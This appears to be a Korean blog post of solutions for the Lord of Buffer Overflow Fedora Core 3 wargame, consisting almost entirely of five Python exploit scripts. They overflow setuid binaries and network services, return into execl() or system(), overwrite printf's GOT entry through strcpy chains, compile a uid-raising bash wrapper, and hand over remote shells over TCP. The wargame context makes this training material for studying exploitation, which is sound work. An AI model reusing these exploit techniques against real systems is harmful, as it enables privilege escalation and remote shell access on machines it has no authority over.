Lord of Buffer Overflow Fedora Core 3에 대한 설명은 다른 블로그에 많으니 생략하겠습니다.
Gate -> Iron Golem
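#!/usr/bin/python
"""LOB FC3, Gate -> Iron Golem: return into execl() with a forged frame.

Layout used by the exploit: 264 bytes of filler, then the saved-ebp slot,
then the return address.  The return address is execl+3, i.e. execl with
its first three prologue bytes skipped, so the function runs on the
forged ebp we supply -- presumably so its first argument is read from an
address of our choosing rather than from the real stack (TODO confirm in
gdb).  That address must end up pointing at a string naming a program,
which is why ./shell is symlinked under the two-byte name 0x68 0x10.

Written for Python 2 (bytes == str); the b"" literals also keep it valid
on Python 3, where the original's str + bytes concatenation would fail.
Every address is specific to the author's Fedora Core 3 image and must be
re-derived for any other box.
"""
import os
import subprocess
from struct import pack

# Address constants from the author's FC3 image.
EXECL = 0x7a5720 + 3        # execl() in libc, prologue skipped
FAKE_EBP = 0x804962c - 8    # forged saved ebp (presumably so [ebp+8] feeds execl's arg 0)
LINK_NAME = b"\x68\x10"     # name the forged argument pointer resolves to
TARGET = b"./iron_golem"
PAD = 264                   # bytes of filler up to the saved-ebp slot

# Helper program that the target ends up executing: promote the real
# uid/gid to the effective ones inherited from the setuid target, then
# run bash.  unistd.h is included and the execl sentinel is a real null
# pointer so the file also compiles cleanly (and correctly) on a modern gcc.
SHELL_SOURCE = """\
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]){
    setreuid(geteuid(), geteuid());
    setregid(getegid(), getegid());
    execl("/bin/bash", "sh", (char *)0);
    return 0;
}
"""


def p(x):
    """Pack *x* as a 32-bit little-endian value (bytes on Py2 and Py3)."""
    return pack("<L", x)


def build_payload():
    """Return argv[1]: filler, forged ebp, then execl+3 with its NUL stripped.

    libc sits at a low address on this image, so the top byte of EXECL is
    0x00.  It is stripped here and the NUL that terminates the argv string
    supplies it instead.  rstrip (rather than the original replace) so a
    NUL anywhere else would fail loudly at exec time instead of silently
    shifting the address.
    """
    return b"\x90" * PAD + p(FAKE_EBP) + p(EXECL).rstrip(b"\x00")


def write_shell_source(path="shell.c"):
    """Write SHELL_SOURCE to *path*, closing the file even on error."""
    with open(path, "w") as f:
        f.write(SHELL_SOURCE)


def main():
    """Build ./shell, link it under LINK_NAME and run the target.

    The target is executed with an argv list (no shell), so payload bytes
    such as '$' (0x24) and '#' (0x23) -- both present in this payload --
    cannot be mangled by /bin/sh as they could with os.system().
    Raises RuntimeError if gcc fails, rather than running the exploit
    against a dangling symlink.
    """
    write_shell_source()
    if subprocess.call(["gcc", "-o", "shell", "shell.c"]) != 0:
        raise RuntimeError("gcc failed to build ./shell")
    # Re-runnable: replace a leftover link instead of letting ln fail.
    if os.path.lexists(LINK_NAME):
        os.remove(LINK_NAME)
    os.symlink(b"shell", LINK_NAME)
    subprocess.call([TARGET, build_payload()])
    # Expected on success:
    #   sh-3.00$ my-pass
    #   euid = 501
    #   blood on the fedora


if __name__ == "__main__":
    main()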
Iron Golem -> Dark Eyes
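#!/usr/bin/python
"""LOB FC3, Iron Golem -> Dark Eyes: ret-sled into execl().

Layout used by the exploit: 268 bytes of filler, then three copies of a
lone `ret` gadget, then the address of execl.  The rets presumably walk
esp upward so that, when execl finally runs, the argument pointer it
reads is something the kernel already placed above the payload (TODO
confirm against the binary); that pointer resolves to a string starting
0x3c 0xed 0x83, which is why ./shell is symlinked under that name.

Note the original created the link with os.system("ln -s shell <..."):
the first byte of the name is '<', which /bin/sh treats as an input
redirection, so that command never reached ln with the intended name.
os.symlink() below bypasses the shell entirely.

Python 2 script (bytes == str); the b"" literals keep it valid on
Python 3.  Every address is specific to the author's Fedora Core 3 image.
"""
import os
import subprocess
from struct import pack

EXECL = 0x7a5720             # execl() in libc (top byte 0x00 on this image)
RET_GADGET = 0x80484b9       # a lone `ret` inside ./dark_eyes
LINK_NAME = b"\x3c\xed\x83"  # name the argument pointer resolves to
TARGET = b"./dark_eyes"
ARGV0 = b"malhyuk"
PAD = 268                    # bytes of filler up to the return-address slot

# Helper program that the target ends up executing: promote the real
# uid/gid to the effective ones inherited from the setuid target, then
# run bash.  unistd.h is included and the execl sentinel is a real null
# pointer so the file also compiles cleanly (and correctly) on a modern gcc.
SHELL_SOURCE = """\
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]){
    setreuid(geteuid(), geteuid());
    setregid(getegid(), getegid());
    execl("/bin/bash", "sh", (char *)0);
    return 0;
}
"""


def p(x):
    """Pack *x* as a 32-bit little-endian value (bytes on Py2 and Py3)."""
    return pack("<L", x)


def build_payload():
    """Return argv[1]: filler, three rets, then execl with its NUL stripped.

    The argv string's own terminator completes the 4-byte execl address.
    rstrip (rather than the original replace) so a NUL anywhere else fails
    at exec time instead of silently shifting the address.
    """
    return b"\x90" * PAD + p(RET_GADGET) * 3 + p(EXECL).rstrip(b"\x00")


def write_shell_source(path="shell.c"):
    """Write SHELL_SOURCE to *path*, closing the file even on error."""
    with open(path, "w") as f:
        f.write(SHELL_SOURCE)


def main():
    """Build ./shell, link it under LINK_NAME and exec the target.

    Raises RuntimeError if gcc fails, rather than running the exploit
    against a dangling symlink.
    """
    write_shell_source()
    if subprocess.call(["gcc", "-o", "shell", "shell.c"]) != 0:
        raise RuntimeError("gcc failed to build ./shell")
    # Re-runnable: replace a leftover link instead of failing.
    if os.path.lexists(LINK_NAME):
        os.remove(LINK_NAME)
    os.symlink(b"shell", LINK_NAME)
    # execv replaces this process exactly as the original os.execl did.
    # The str() wrapper is gone: on Python 3 it would turn the bytes into
    # their repr text and destroy the payload.
    os.execv(TARGET, [ARGV0, build_payload()])
    # Expected on success:
    #   sh-3.00$ my-pass
    #   euid = 502
    #   because of you


if __name__ == "__main__":
    main()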
Dark Eyes -> Hell Fire
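#!/usr/bin/python
"""LOB FC3, Dark Eyes -> Hell Fire: return straight into system() over TCP.

The service on port 7777 prompts with "you : "; 268 bytes of filler reach
the saved return address, which is overwritten with the address the
original exploit uses for system().  No argument is placed explicitly --
the exploit relies on whatever pointer already follows on the stack (TODO
confirm against the binary).  Note that the GOT-overwrite exploits for the
later levels write 0x007507c0 as system(); which of the two values is the
real entry point should be checked in gdb before reusing this address.

The payload travels over a socket, so the NUL top byte of the libc address
is not a problem here.  Runs under Python 2 or 3: the payload is built
with the standard library, and pwntools is only imported for the
connection, so build_payload() can be tested without it.
"""
from struct import pack

HOST = "10.10.10.128"   # author's lab VM; change for your own setup
PORT = 7777
SYSTEM = 0x00750784      # system() address used by the original exploit
PAD = 268                # bytes of filler up to the return-address slot
PROMPT = b"you : "


def p32(x):
    """Pack *x* as 32-bit little-endian bytes (same result as pwntools' p32)."""
    return pack("<I", x)


def build_payload():
    """Return the bytes to send: filler followed by the system() address.

    No str() wrapper around the packed address: on Python 3, str(bytes)
    yields the repr text and would corrupt the payload.
    """
    return b"\x90" * PAD + p32(SYSTEM)


def main():
    """Connect, wait for the prompt, send the payload, hand over the shell."""
    # Third-party; imported here so the module imports without pwntools.
    from pwn import remote

    r = remote(HOST, PORT)
    r.recvuntil(PROMPT)
    r.send(build_payload())
    r.interactive()
    # Expected on success:
    #   $ my-pass
    #   euid = 503
    #   sign me up


if __name__ == "__main__":
    main()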
Hell Fire -> Evil Wizard
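#!/usr/bin/python
# -*- coding: utf-8 -*-
"""LOB FC3, Hell Fire -> Evil Wizard: rewrite printf's GOT entry to system().

Each strcpy(PRINTF_GOT + i, src_i) frame copies one byte of system's
address -- 0x007507c0, little-endian c0 07 75 00 -- from a location in
the binary that already holds that byte value (per the original's naming
of those addresses; confirm in gdb).  The pop-pop-ret gadget used as each
strcpy's return address discards its two arguments so the chain continues.
The final printf@plt call therefore runs system() with SHELL (presumably a
string in libc suitable for system(); it sits in the same low range as the
other libc addresses) as its argument.

All chain addresses are 0x0804xxxx and NUL-free, which matters because the
payload arrives through argv; only SHELL has a NUL, and that one is
supplied by the argv string's terminator.

The original file put the shebang on line 2, where it has no effect, and
spelled the encoding cookie "coding : utf-8", which PEP 263 does not
recognise; both are fixed here.  Python 2 script; the b"" literals keep
it valid on Python 3.  Every address is specific to the author's FC3 image.
"""
import os
from struct import pack

STRCPY = 0x8048495          # strcpy@plt in ./evil_wizard
PRINTF_PLT = 0x8048424
PRINTF_GOT = 0x8049884
# Locations inside the binary holding the bytes 0xc0, 0x07, 0x75, 0x00
# (named system_c0 .. system_00 in the original; confirm on your image).
SYSTEM_BYTES = [0x8048420, 0x8048154, 0x80482c8, 0x8049840]
SHELL = 0x833603            # argument handed to system(); top byte 0x00
PPR = 0x804854f             # pop; pop; ret
TARGET = b"./evil_wizard"
ARGV0 = b"malhyuk"
PAD = 268                   # bytes of filler up to the return-address slot


def p(x):
    """Pack *x* as a 32-bit little-endian value (bytes on Py2 and Py3)."""
    return pack("<L", x)


def build_payload():
    """Return argv[1]: filler, four strcpy frames, then the system() call.

    The trailing NUL of SHELL is stripped and completed by the argv
    terminator; rstrip (rather than the original replace) so a NUL anywhere
    else fails at exec time instead of silently shifting the address.
    """
    parts = [b"A" * PAD]
    for i, src in enumerate(SYSTEM_BYTES):
        # strcpy(PRINTF_GOT + i, src); then pop-pop-ret into the next frame.
        parts.append(p(STRCPY) + p(PPR) + p(PRINTF_GOT + i) + p(src))
    # printf@plt now resolves to system(); "AAAA" is its unused return address.
    parts.append(p(PRINTF_PLT) + b"AAAA" + p(SHELL).rstrip(b"\x00"))
    return b"".join(parts)


def main():
    """Exec the target with the payload as argv[1].

    execv replaces this process exactly as the original os.execl did; the
    str() wrapper is gone because on Python 3 it would turn the bytes into
    their repr text and destroy the payload.
    """
    os.execv(TARGET, [ARGV0, build_payload()])
    # Expected on success:
    #   sh-3.00$ my-pass
    #   euid = 504
    #   get down like that


if __name__ == "__main__":
    main()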
Evil Wizard -> Dark Stone
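#!/usr/bin/python
"""LOB FC3, Evil Wizard -> Dark Stone: printf GOT overwrite over TCP.

Same technique as the Evil Wizard exploit, against the service on port
8888: four strcpy frames, each glued to the next by a pop-pop-ret gadget,
copy the bytes c0 07 75 00 (system() = 0x007507c0) into printf's GOT slot
one byte at a time, and a final printf@plt call runs system() with the
string at SHELL as its argument (presumably a string in libc suitable for
system(); confirm in gdb).  The byte-source addresses are taken from the
original and should be checked on your own image.

The payload goes over a socket, so the NUL in SHELL needs no
argv-terminator trick.  Runs under Python 2 or 3: the payload is built
with the standard library, and pwntools is only imported for the
connection, so build_payload() can be tested without it.
"""
from struct import pack

HOST = "10.10.10.128"   # author's lab VM; change for your own setup
PORT = 8888
STRCPY = 0x8048438       # strcpy@plt in ./dark_stone
PRINTF_PLT = 0x8048408
PRINTF_GOT = 0x804984c
# Locations inside the binary holding the bytes 0xc0, 0x07, 0x75, 0x00.
SYSTEM_BYTES = [0x80484d0, 0x804817c, 0x80482b4, 0x8049804]
SHELL = 0x833603         # argument handed to system()
PPR = 0x80484f3          # pop; pop; ret
PAD = 268                # bytes of filler up to the return-address slot
PROMPT = b"you : "


def p32(x):
    """Pack *x* as 32-bit little-endian bytes (same result as pwntools' p32)."""
    return pack("<I", x)


def build_payload():
    """Return the bytes to send: filler, four strcpy frames, system() call.

    No str() wrapper: on Python 3, str(bytes) yields the repr text and
    would corrupt the payload.
    """
    parts = [b"\x90" * PAD]
    for i, src in enumerate(SYSTEM_BYTES):
        # strcpy(PRINTF_GOT + i, src); then pop-pop-ret into the next frame.
        parts.append(p32(STRCPY) + p32(PPR) + p32(PRINTF_GOT + i) + p32(src))
    # printf@plt now resolves to system(); "AAAA" is its unused return address.
    parts.append(p32(PRINTF_PLT) + b"AAAA" + p32(SHELL))
    return b"".join(parts)


def main():
    """Connect, wait for the prompt, send the payload, hand over the shell."""
    # Third-party; imported here so the module imports without pwntools.
    from pwn import remote

    r = remote(HOST, PORT)
    r.recvuntil(PROMPT)
    r.send(build_payload())
    r.interactive()
    # Expected on success:
    #   $ my-pass
    #   euid = 505
    #   let there be light


if __name__ == "__main__":
    main()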
All Clear